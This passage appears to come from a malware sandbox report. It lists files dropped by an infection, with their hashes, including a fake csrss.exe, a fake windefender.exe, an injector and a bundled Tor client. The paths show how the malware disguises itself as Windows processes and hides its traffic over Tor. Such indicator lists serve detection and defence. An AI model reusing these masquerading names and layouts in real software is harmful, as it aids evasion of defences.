| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Windows\rss\csrss.exe
| MD5 | c067b4583e122ce237ff22e9c2462f87 |
| SHA1 | 8a4545391b205291f0c0ee90c504dc458732f4ed |
| SHA256 | a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e |
| SHA512 | 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3 |
C:\Windows\rss\csrss.exe
| MD5 | c067b4583e122ce237ff22e9c2462f87 |
| SHA1 | 8a4545391b205291f0c0ee90c504dc458732f4ed |
| SHA256 | a16dbcd03a7549fbaf7cad1bedd01dcb961a5d43c873f1d1a50892618a06662e |
| SHA512 | 0767cba9f10154b4e28cf6a55b6fc827a96c4fbc88e2d67acd645a0a7a604a3beb63ea58d7febcf8b17de1ea3d2097e76ceac1b36b9fecf9a0945a31a9e211c3 |
C:\Users\Admin\AppData\Local\Temp\1B25.exe
| MD5 | 4bb2473f19d24fbd573a45050f59ea62 |
| SHA1 | 32cc57c1f1f0716e810b9dfdf101dddc02faeb0b |
| SHA256 | 064c16bb2715e8f8713605c4ffc75962302cf0c8a7b06dbac92b40a05f1dd3bf |
| SHA512 | d82387755e966880251965328e7e8281bba4517b4cb6ff0959c972853bb8bb59d6513d48755d56f091b611ed3c4ef101a6e04696606f2267646300e73de0c5b3 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | bf947bc2069acc2e8098145fbb2bc999 |
| SHA1 | f8c4e497f4203e50a77f941518d63a3954ba3a88 |
| SHA256 | 956c37cd30d12c17c547247892c90c755c2a55d09b48813e48fbb90a7e84a814 |
| SHA512 | aee91eee1e83e4accdabceb5b6d69c7dc0d9376158bbd35d83eec90ab7ef35f17d08c66556a4be750ee366513b18dd60daf1329aa53ef2c264c2a1aa6938df73 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | ee1c8c269c3b9765365c69c903417dc2 |
| SHA1 | e864fac847751e77b190bc20c5d10beaf5c44f10 |
| SHA256 | 4e0aa852506c923025a26267f69b60930a822384b7ca284c5850dc0ea81527d1 |
| SHA512 | dc5075c46378615d7b8bcf7d8d7ef75be7962f2c686a4beb73d1c1e06c05842c51e8ffb5893d3d0f83f9c0dccd96b0d918e6a593d675d27e9c90c885a0ca1bb7 |
C:\Users\Admin\AppData\Local\Temp\5CA4.exe
| MD5 | 5e2d2087340d2d4e4faa3e945c932a95 |
| SHA1 | da8b6a28923983fe9b1e0b18f0b540df24382851 |
| SHA256 | 63ee50294b30ab0e0569baea7a8b52454ba95264fdce6709d3437a462be9d888 |
| SHA512 | 47e45183467aff329e74f347b83f90a62f1ef5168368c46379c0d0b7defcce1192e5e13dd7fece5b39050386de11152a5001fb3fc7bb8ebdea576008bc90b3d0 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 30d82784e1ab72a48555a1067e1b1a36 |
| SHA1 | c56372187c16f19c75bcd095af46dc98b1b6830f |
| SHA256 | d165aa701d86842494696b424aae8f2b3164e2644b05012f42f0d324a317609c |
| SHA512 | 57b23832f45bf6c88d2dc96d67a876b87bb2f959cb8f045d3b1321993de9a608a37e638be38bc189e44272a4cf966b9baf9deb21742d58d93885bc0cd7843847 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
| MD5 | 055ae7c584a7b012955bf5d874f30cfa |
| SHA1 | f2b4d8c5307ff09607be929ec08fc2727bf03dcf |
| SHA256 | d51b5bf807f6de3b5521b49b9a722592fb85aee1ea2f1c03bbb5255d62bfb9c8 |
| SHA512 | 910bb0be7a3840bb37cb453ea066677a5327e272cfa0995f7a600bd4eb2e7c31685dcc0758c3b2cf07c7622fd45b2d4cdd3a4272cddaf9e97e2ffc48120646c5 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
| MD5 | 055ae7c584a7b012955bf5d874f30cfa |
| SHA1 | f2b4d8c5307ff09607be929ec08fc2727bf03dcf |
| SHA256 | d51b5bf807f6de3b5521b49b9a722592fb85aee1ea2f1c03bbb5255d62bfb9c8 |
| SHA512 | 910bb0be7a3840bb37cb453ea066677a5327e272cfa0995f7a600bd4eb2e7c31685dcc0758c3b2cf07c7622fd45b2d4cdd3a4272cddaf9e97e2ffc48120646c5 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll
| MD5 | b7c32c8e7d21aa9b79470037227eba43 |
| SHA1 | 38d719b10ca035cee65162c1a44e2c62123d41b4 |
| SHA256 | 99b4042a858a9e437917c8256692e9ba161b87054ccf5e22538e86bb35c34f23 |
| SHA512 | d85345380b9605c8484e11873218aa4eaeea573ca51eedada6d0518695a2b184bb22faf7c5e3d88330935774ced17e9d80c577b06603aa1ca6dab748b0bd15a7 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll
| MD5 | 736443b08b5a52b6958f001e8200be71 |
| SHA1 | e56ddc8476aef0d3482c99c5bfaf0f57458b2576 |
| SHA256 | da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4 |
| SHA512 | 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssp-0.dll
| MD5 | 7cdbaca31739500aefc06dd85a8558ff |
| SHA1 | adc36ec6a3cdc7e57a1b706c820e382627f6cb90 |
| SHA256 | 0a1dee5dd5234971f7526f3d5f8b7e2cfdcb536e18debd51c985010fb504fbdb |
| SHA512 | 6df8ac9054f27ebbef9642ce79ff7ba836411ea0ed0bd04b3cfe724a336a91f665c2cc0b7a4bfc99a80786d1a6d361b971a7dbb7a298b919a1baa812541841ba |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll
| MD5 | 736443b08b5a52b6958f001e8200be71 |
| SHA1 | e56ddc8476aef0d3482c99c5bfaf0f57458b2576 |
| SHA256 | da1f75b9ce5f47cb78a6930a50c08397ee4d9778302746340f4057fcd838dbf4 |
| SHA512 | 9dfcdb1186b089e7961767d427de986ad8e5f7715b7592984349d0b8e7f02198137c83e8c79a096a7475ad9f4695f52539fa08fa65912860ddf0a85515a7cda1 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll
| MD5 | d92e59b71bf8a0d827597ed95b2eca42 |
| SHA1 | cfc49ff29eddb7127fbed166a8a1e740ea3dfb9a |
| SHA256 | b6ef5cb4c093431f3e73c53e66df33d08237ba46d457d119a2c4dcae582314e3 |
| SHA512 | be65e003a498e753b08912d697e9b4d8a28828581c17d1e8e20880372a81030ce18610eeff230c8880e68a831041075bb2ebffcf318d29ebf58bc856fac3df04 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp
| MD5 | 2e4e045fcb4a09cf4d78d3696375732f |
| SHA1 | 705973d3a2ebb2e45c2d4fc87572e5cdc9fb4dda |
| SHA256 | bcbf90f6d8c328a6d7cc020a826f6f1eb08b92b20eeae9a4f2f9d05a48639bf9 |
| SHA512 | e9d8a69e2fe77ccf539d4e54063026e2d59f58bd42e47a92065e88c7f908d600ffe79195252f685aaae705bff1bd88496d1bc8ee1928d486a980269f0e8cfdc0 |
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\cached-microdescs.new
| MD5 | bcd7bed0f2ef673c90b6cee00f5da596 |
| SHA1 | 9291fffe3c26120b8fb6de9db82bcf443b4af370 |
| SHA256 | d470d6e46bfdeb7aee92288fa8479a6eb620bc5e1576a428f7f66e023bc98e46 |
| SHA512 | 5c8df962cbdc8f36d4d1e6a0fd2400c3afd46defd3c8685602ac6fdcfa4624a8ffc306f66861fe3fd1693d3395a04c1338b3a976679f08460bd78b5ca9f0cdb3 |